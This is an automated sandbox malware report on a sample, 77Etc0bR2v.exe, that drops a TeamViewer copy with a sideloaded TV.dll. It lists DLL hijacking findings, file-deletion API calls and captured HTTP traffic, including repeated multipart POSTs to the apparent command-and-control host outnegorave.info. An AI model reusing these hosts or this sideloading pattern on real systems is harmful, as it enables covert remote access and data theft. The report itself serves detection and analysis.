Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: SHFolder.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: VERSION.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: version.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: uxtheme.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: SHFOLDER.DLL	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: CLDAPI.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: winsta.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: msimg32.dll

Compliance:

Uses 32bit PE files

Source: 77Etc0bR2v.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

EXE planting / hijacking vulnerabilities found

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

EXE: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Jump to behavior

DLL planting / hijacking vulnerabilities found

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: SHFolder.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: VERSION.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: version.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: uxtheme.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: SHFOLDER.DLL	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	DLL: CLDAPI.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: winsta.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	DLL: msimg32.dll

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.5:49752 version: TLS 1.2

PE / OLE file has a valid certificate

Source: 77Etc0bR2v.exe

Static PE information: certificate valid

Binary contains paths to debug symbols

Source:	Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000000.248354539.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp
Source:	Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000000.248354539.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp
Source:	Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.268193262.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.536045317.000000006EAFD000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.514763598.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.341816195.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.362277725.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345987825.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000002.367975860.000000006EAFD000.00000002.00020000.sdmp

Spreading:

Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Code function: 1_2_00405E61 FindFirstFileA,FindClose,	1_2_00405E61
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Code function: 1_2_0040263E FindFirstFileA,	1_2_0040263E
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Code function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_0040548B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,	3_2_6EAF28B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,	3_2_6EAF2DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW,	6_2_004BF3A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose,	6_2_0050331C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,	6_2_6EAF2DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,	6_2_6EAF28B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,	8_2_6EAF28B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,	8_2_6EAF2DF0

Networking:

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85134Content-Type: multipart/form-data; boundary=--------3509900953User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 86809Content-Type: multipart/form-data; boundary=--------4132168479User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 88912Content-Type: multipart/form-data; boundary=--------142932537User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84988Content-Type: multipart/form-data; boundary=--------175819007User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84980Content-Type: multipart/form-data; boundary=--------4273960975User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84976Content-Type: multipart/form-data; boundary=--------1234881971User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84926Content-Type: multipart/form-data; boundary=--------3962184161User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84962Content-Type: multipart/form-data; boundary=--------1422274513User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85001Content-Type: multipart/form-data; boundary=--------1112577220User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85017Content-Type: multipart/form-data; boundary=--------3839284298User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85026Content-Type: multipart/form-data; boundary=--------3697122959User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85132Content-Type: multipart/form-data; boundary=--------847302753User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85014Content-Type: multipart/form-data; boundary=--------4150287082User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85006Content-Type: multipart/form-data; boundary=--------2687879271User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84930Content-Type: multipart/form-data; boundary=--------1383517322User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84992Content-Type: multipart/form-data; boundary=--------2011772679User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84976Content-Type: multipart/form-data; boundary=--------1980331567User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84961Content-Type: multipart/form-data; boundary=--------2185878550User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84985Content-Type: multipart/form-data; boundary=--------3572611147User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84961Content-Type: multipart/form-data; boundary=--------2639774921User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84974Content-Type: multipart/form-data; boundary=--------428629968User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84984Content-Type: multipart/form-data; boundary=--------1864185560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84991Content-Type: multipart/form-data; boundary=--------1379028263User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84962Content-Type: multipart/form-data; boundary=--------2355185848User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85028Content-Type: multipart/form-data; boundary=--------1302388111User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84976Content-Type: multipart/form-data; boundary=--------1638634252User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85242Content-Type: multipart/form-data; boundary=--------3575858873User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84965Content-Type: multipart/form-data; boundary=--------285568995User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 88438Content-Type: multipart/form-data; boundary=--------2471988User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85028Content-Type: multipart/form-data; boundary=--------1216366252User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85015Content-Type: multipart/form-data; boundary=--------3636690275User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84958Content-Type: multipart/form-data; boundary=--------1861026164User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84979Content-Type: multipart/form-data; boundary=--------2060288736User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85018Content-Type: multipart/form-data; boundary=--------1941005641User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84997Content-Type: multipart/form-data; boundary=--------168896387User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84996Content-Type: multipart/form-data; boundary=--------2074872272User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85003Content-Type: multipart/form-data; boundary=--------1323967378User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84983Content-Type: multipart/form-data; boundary=--------29895310User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 84996Content-Type: multipart/form-data; boundary=--------4240026889User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dout.aspx?s=39260701&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmRiamBoamBuTJKIemBMmoKGemDwysbMaMTEZsLKzMLGvmLIZshiyspkxsjGYG7Mwr5kanBybGRgbmRiTJqSiHpg8MrGzGjExGbCyszCxr5iyGbIYsrKZMbIxmBuzMK+ZGpwcmxkYG5kYkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: /Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=39260701&client=DynGate&p=10000002 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dout.aspx?s=39260710&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyakoh6YPDKxsxoxMRmwsrMwsa+YshmyGLKymTGyMZgbszCvmRqcHJsZGBuZGJMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAAiHrQD5CYOpp7/Zr7rEi/B/CnsUWehIzsjknPiOAQDnHgKBwxxFKCieiWhL1afx9eeCX4JSt5eDF8v1iZJ9o8IQAaQCrRik6ahUAKNkNBEdbLOE0i1SajuFK2r+FTuYEW7cUOxEu9d8mU9y6bkESGL5okL1ayDi3W7V7M1bCeZL HTTP/1.1Accept: /Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=39260710&client=DynGate&p=10000002 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dout.aspx?s=39260719&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyakoh6YPDKxsxoxMRmwsrMwsa+YshmyGLKymTGyMZgbszCvmRqcHJsZGBuZGJMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAC+ETh/xoaDswnDrzpj2ezWmEgvX0+Ej1wtEYkKVyn+ydtvyFua/3Iri8RKmf9YcE9fPWO9gKA702VTWXdcuP9paHCFsUzDIqXKZ7SOAdSL0LmDI+BCYg1VARH3ovhl/wWKHhKvbobA55zrvFJv9j5s06datZSDN5Epd+G/FNL5V HTTP/1.1Accept: /Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=39260719&client=DynGate&p=10000002 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dout.aspx?s=39260736&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExGbCyszCxr5iyGbIYsrKZMbIxmBuzMK+ZGpwcmxkYG5kYkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: /Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=39260736&client=DynGate&p=10000002 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 178.255.154.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /dout.aspx?s=12652280&p=10000001&client=DynGate HTTP/1.1Accept: /Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 178.255.154.140Content-Length: 3Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /dout.aspx?s=12652280&p=10000002&client=DynGate HTTP/1.1Accept: /Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 178.255.154.140Content-Length: 500000Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /din.aspx?s=12652280&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 178.255.154.140Connection: Keep-AliveCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
